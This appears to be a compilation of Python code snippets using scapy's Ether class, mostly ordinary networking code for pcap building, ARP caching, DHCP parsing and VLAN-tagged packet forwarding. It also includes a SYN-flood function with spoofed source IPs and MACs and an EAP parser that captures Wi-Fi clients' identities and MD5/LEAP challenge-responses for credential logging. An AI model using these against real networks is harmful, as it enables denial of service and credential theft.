def set_custom_field_pcap(nb_fields, out_dir, packet_size=256):
    """Build one PTP-over-Ethernet packet and write it to ``test.pcap``.

    The packet is an ``Ether`` header with fixed source and destination
    MAC addresses, a ``PTP`` layer, and whatever ``add_layers(nb_fields, 1)``
    returns. It is passed through ``add_padding`` together with
    ``packet_size`` before being written with ``wrpcap``.

    Args:
        nb_fields: Forwarded to ``add_layers`` as its first argument.
        out_dir: Directory in which ``test.pcap`` is written.
        packet_size: Forwarded to ``add_padding`` (defaults to 256).
    """
    ethernet = Ether(src='0C:C4:7A:A3:25:34', dst='0C:C4:7A:A3:25:35')
    frame = ethernet / PTP()
    frame = frame / add_layers(nb_fields, 1)
    padded = add_padding(frame, packet_size)
    pcap_path = '%s/test.pcap' % out_dir
    wrpcap(pcap_path, padded)
# python类Ether()的实例源码 (example source code using the Python class Ether())
def update_cache(self):
    """Rebuild ``self._arp_cache`` from an ``arping`` of the router's /24.

    ``arping`` is called on ``self._router_ip + "/24"`` over
    ``self._interface``. The cache is reset to an empty list and then
    filled with ``[psrc, lower-cased Ether src]`` pairs taken from the
    second element of every answered pair. Any exception is logged at
    error level and not re-raised.
    """
    try:
        answered, _unanswered = arping(
            self._router_ip + "/24",
            iface=self._interface,
            verbose=False,
        )
        # Reset only after arping returned, so a failed call keeps the
        # previous cache contents.
        self._arp_cache = []
        if answered:
            for _sent, reply in answered:
                entry = [reply[ARP].psrc, reply[Ether].src.lower()]
                self._arp_cache.append(entry)
        _LOGGER.debug("ARP cache: %s", self._arp_cache)
    except Exception as err:
        _LOGGER.error("Error when trying update ARP cache: %s", str(err))
def get_dhcp_mt(self, buff):
    """Pick out the DHCP message type from a raw frame buffer.

    Args:
        buff: Raw frame data handed to ``scapy.Ether`` for dissection;
            the dissected packet must contain a ``scapy.DHCP`` layer.

    Returns:
        The entry of ``constants.DHCP_MESSATE_TYPE`` keyed by the value
        of the packet's ``message-type`` option.
    """
    ether_packet = scapy.Ether(buff)
    dhcp_packet = ether_packet[scapy.DHCP]
    options = dhcp_packet.options
    # Options look like ('message-type', 1). The message type is usually
    # the first option, but nothing here guarantees that ordering, so
    # search for it and only fall back to the first entry when it is not
    # found (which keeps the previous behaviour for such packets).
    message = options[0]
    for option in options:
        if isinstance(option, tuple) and option[0] == 'message-type':
            message = option
            break
    return constants.DHCP_MESSATE_TYPE[message[1]]
def cmd_synflood(ip, interface, count, port, forgemac, forgeip, verbose):
    """Repeatedly send an Ether/IP/TCP packet to ``ip``:``port``.

    The TCP layer is created with scapy's defaults apart from the
    destination port; the source port is re-randomised for every packet.

    Args:
        ip: Destination IP address.
        interface: If truthy, assigned to ``conf.iface`` before building
            the packet.
        count: Number of packets to send; ``0`` means loop until
            interrupted.
        port: Destination TCP port.
        forgemac: If truthy, use a random source MAC for each packet.
        forgeip: If truthy, replace the last octet of the source IP with
            a random value in 1..254 for each packet.
        verbose: If truthy, print each packet's summary instead of a dot.

    Returns:
        ``True`` once ``count`` packets have been sent.
    """
    conf.verb = False
    if interface:
        conf.iface = interface

    pkt = Ether() / IP(dst=ip) / TCP(dport=port)

    print("please, remember to block your RST responses")

    sent = 0
    while True:
        if forgeip:
            # Keep the first three octets of the current source address.
            prefix = pkt[IP].src.rsplit('.', maxsplit=1)[0]
            pkt[IP].src = "%s.%s" % (prefix, randint(1, 254))
        if forgemac:
            pkt[Ether].src = RandMAC()
        pkt[TCP].sport = randint(10000, 65000)

        if verbose:
            print(pkt.summary())
        else:
            # Progress dot, flushed immediately so it shows up live.
            print('.', end='', flush=True)

        sendp(pkt)
        sent += 1
        if sent == count and count != 0:
            break

    return True
def cmd_arping(ip, iface, verbose):
    """Broadcast an ARP request for ``ip`` and show the answers.

    Args:
        ip: Value passed to ``ARP(pdst=...)``.
        iface: If truthy, assigned to ``conf.iface`` before sending.
        verbose: If truthy, configure logging at INFO level with a
            message-only format.
    """
    if verbose:
        logging.basicConfig(level=logging.INFO, format='%(message)s')

    conf.verb = False
    if iface:
        conf.iface = iface

    probe = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip)
    answered, _unanswered = srp(probe, timeout=2)
    answered.show()
def parse_eap_packet(self, packet):
    """Record identity and challenge/response data from one EAP packet.

    Packets whose EAP type is not a key of ``EAP_TYPES`` are ignored, as
    are packets for which no client MAC can be determined. Otherwise the
    matching ``WiFiClient`` in ``self.wifi_clients`` is created on first
    sight and updated:

    * ``"ID"`` responses set ``client.identity``.
    * ``"MD5"`` and ``"LEAP"`` packets fill a ``ChallengeResponseAuth``
      stored under ``client.authentications[<type>][<EAP id>]``.

    ``client.check_and_log_credentials()`` is called after every packet
    that reaches a client.

    Args:
        packet: Dissected packet containing an ``EAP`` layer (and a
            ``LEAP`` layer when the EAP type maps to ``"LEAP"``).
    """
    eap_layer = packet[EAP]
    if eap_layer.type not in EAP_TYPES:
        return

    # EAP code values compared against ``eap_layer.code`` below.
    REQUEST, RESPONSE = 1, 2

    # An Ether layer means that we are the Access Point that the user is
    # connecting to.
    if Ether in packet:
        client_mac = packet[Ether].dst
    elif self._packet_is_from_ap(packet):
        client_mac = self._get_destination_from_packet(packet)
    else:
        client_mac = self._get_source_from_packet(packet)

    if not client_mac:
        return

    if client_mac not in self.wifi_clients:
        self.wifi_clients[client_mac] = WiFiClient(client_mac)
    client = self.wifi_clients[client_mac]
    client.user_id = eap_layer.id

    eap_type = EAP_TYPES[eap_layer.type]
    if eap_type == "ID" and eap_layer.code == RESPONSE:
        client.identity = eap_layer.identity
    elif eap_type in ("MD5", "LEAP"):
        # Both methods keep one record per EAP id, created on first use.
        auth_id = eap_layer.id
        records = client.authentications[eap_type]
        if auth_id not in records:
            records[auth_id] = ChallengeResponseAuth(auth_id, eap_type)
        authentication = records[auth_id]

        # NOTE(review): ``.encode("HEX")`` is the Python 2 str hex codec;
        # this method will need porting before it can run on Python 3.
        if eap_type == "MD5":
            if eap_layer.code == REQUEST:
                authentication.challenge = eap_layer.load[1:17].encode("HEX")
            elif eap_layer.code == RESPONSE:
                authentication.response = eap_layer.load[1:17].encode("HEX")
        else:
            leap_layer = packet[LEAP]
            if leap_layer.name:
                authentication.username = leap_layer.name
            if eap_layer.code == REQUEST:
                if len(leap_layer.data) == 8:
                    authentication.challenge = leap_layer.data.encode("HEX")
            elif eap_layer.code == RESPONSE:
                if len(leap_layer.data) == 24:
                    # Store the same field whose length was just checked
                    # (previously this read ``eap_layer.data``).
                    authentication.response = leap_layer.data.encode("HEX")

    client.check_and_log_credentials()
def runTest(self):
    """Send one TCP packet on ``eth2`` and fail if nothing was sniffed.

    An Ether/IP/TCP packet (21.0.0.2 -> 22.0.0.2, dport 80, flags "S",
    seq 42) with a short text payload is sent while ``self.Sniffer`` runs
    in a background thread on the same interface. After a fixed 4 second
    wait the test fails when ``self.sniffed_cnt`` is still 0.

    NOTE: earlier experiments that verified the reply via ``dp_poll``,
    ``verify_packet`` and ``Mask`` were disabled in this test and have
    been dropped from the body.
    """
    pkt = scapy2.Ether()
    pkt /= scapy2.IP(src="21.0.0.2", dst="22.0.0.2")
    pkt /= scapy2.TCP(dport=80, flags="S", seq=42)
    pkt /= "badabadaboom"

    # Start the sniffer before sending so the traffic is not missed.
    # NOTE(review): presumably self.Sniffer increments self.sniffed_cnt;
    # confirm against its definition.
    sniffer = Thread(target=self.Sniffer, args=("eth2",))
    sniffer.start()

    scapy2.sendp(pkt, iface='eth2')
    sleep(4)

    # Fail if no reply was seen; self.fail() reports a readable reason
    # instead of "False is not true".
    if self.sniffed_cnt == 0:
        self.fail("no packet was sniffed on eth2 after sending the test packet")
def packet_out(self, in_port, out_port, data):
    """Dump a packet-out and send it VLAN-tagged on the in/out interface.

    The raw frame is printed as a hexdump. When ``self.in_out_iface`` is
    set, the frame is parsed as ``Ether``, a ``Dot1Q`` tag carrying
    ``out_port`` as VLAN id is inserted after the Ethernet header
    (preceded by a second tag carrying ``self.in_out_stag`` when that is
    set), and the result is sent with ``sendp``.

    Args:
        in_port: Ingress port; shown as ``"CONTROLLER"`` when equal to
            ``ofp.OFPP_CONTROLLER``.
        out_port: Port number encoded as the VLAN id of the port tag.
        data: Raw frame to dissect with ``Ether``.
    """
    in_port = "CONTROLLER" if in_port == ofp.OFPP_CONTROLLER else in_port
    # Parenthesised single-argument print behaves the same on Python 2 and 3.
    print("PACKET OUT (%s => %s): " % (in_port, out_port))
    hexdump(data)

    if self.in_out_iface is None:
        return

    # NOTE: this try also covers sendp(), so send failures are reported
    # under the same "could not parse" message as dissection failures.
    try:
        # Dissect the packet.
        pkt = Ether(data)

        # Remove the payload from the Ether frame, remembering its type.
        payload = pkt.payload
        payload_type = pkt.type
        pkt.remove_payload()

        # Insert a Dot1Q shim with vlan_id = out_port.
        if self.in_out_stag is None:
            ## WARNING -- This was changed from 0x88a8 to 0x8100 when
            ## testing with the Intel XL710 quad 10GE boards. The
            ## XL710 does not support the TPID for the STAG.
            ##
            ## Long term, it should be changed back to 0x88a8!
            ##
            pkt.type = 0x8100
            new_pkt = pkt / Dot1Q(vlan=out_port, type=payload_type) / payload
        else:
            pkt.type = 0x8100
            new_pkt = (
                pkt /
                Dot1Q(vlan=self.in_out_stag, type=0x8100) /
                Dot1Q(vlan=out_port, type=payload_type) /
                payload)

        # Send out the packet.
        sendp(new_pkt, iface=self.in_out_iface)

    except Exception:
        # logging.exception records the active traceback itself, so the
        # exception object does not need to be bound.
        logging.exception("Could not parse packet-out data as scapy.Ether:\n")
        logging.error(hexdump(data, 'return'))
def forward_packet(self, pkt):
    """Strip the port-carrying VLAN tag(s) and hand the frame to the agent.

    The received frame must be ``Ether`` followed by a ``Dot1Q`` tag.
    Without ``self.in_out_stag`` that tag's VLAN id is the ingress port.
    With ``self.in_out_stag`` set, the outer tag must carry that value
    (otherwise the frame is dropped) and a second ``Dot1Q`` tag carries
    the ingress port. The tag(s) are removed, the original EtherType is
    restored, and the rebuilt frame is passed to
    ``self.agent.send_packet_in`` when an agent is attached.

    Any failure, including a frame of unexpected shape, is logged rather
    than raised.

    Args:
        pkt: Received scapy packet.
    """
    # Parenthesised single-argument print behaves the same on Python 2 and 3.
    print("Received packet:")
    # bytes() is an alias of str() on Python 2 and yields the raw frame
    # on Python 3.
    hexdump(bytes(pkt))
    pkt.show()

    try:
        # Explicit checks instead of assert, which is stripped under -O.
        if not isinstance(pkt, Ether):
            raise ValueError("frame is not an Ether packet")
        dot1q = pkt.getlayer(1)
        if not isinstance(dot1q, Dot1Q):
            raise ValueError("frame has no Dot1Q tag after the Ether header")

        if self.in_out_stag is None:
            port_tag = dot1q
        else:
            if dot1q.vlan != self.in_out_stag:
                print('Dropping packet because outer tag %d does not match %d' % (
                    dot1q.vlan, self.in_out_stag))
                return
            port_tag = dot1q.getlayer(1)
            if not isinstance(port_tag, Dot1Q):
                raise ValueError("frame has no inner Dot1Q tag")

        # Capture what follows the port tag before detaching everything
        # after the Ethernet header, then restore the inner EtherType.
        payload = port_tag.payload
        payload_type = port_tag.type
        pkt.remove_payload()
        pkt.type = payload_type
        new_pkt = pkt / payload
        in_port = port_tag.vlan

        if self.agent is not None:
            self.agent.send_packet_in(bytes(new_pkt), in_port=in_port)
            print('new packet forwarded to controller (with in_port=%d):' % in_port)
            new_pkt.show()

    except Exception as e:
        logging.exception("Unexpected packet format received by InOutReceiver: %s" % e)
        logging.error(hexdump(bytes(pkt), 'return'))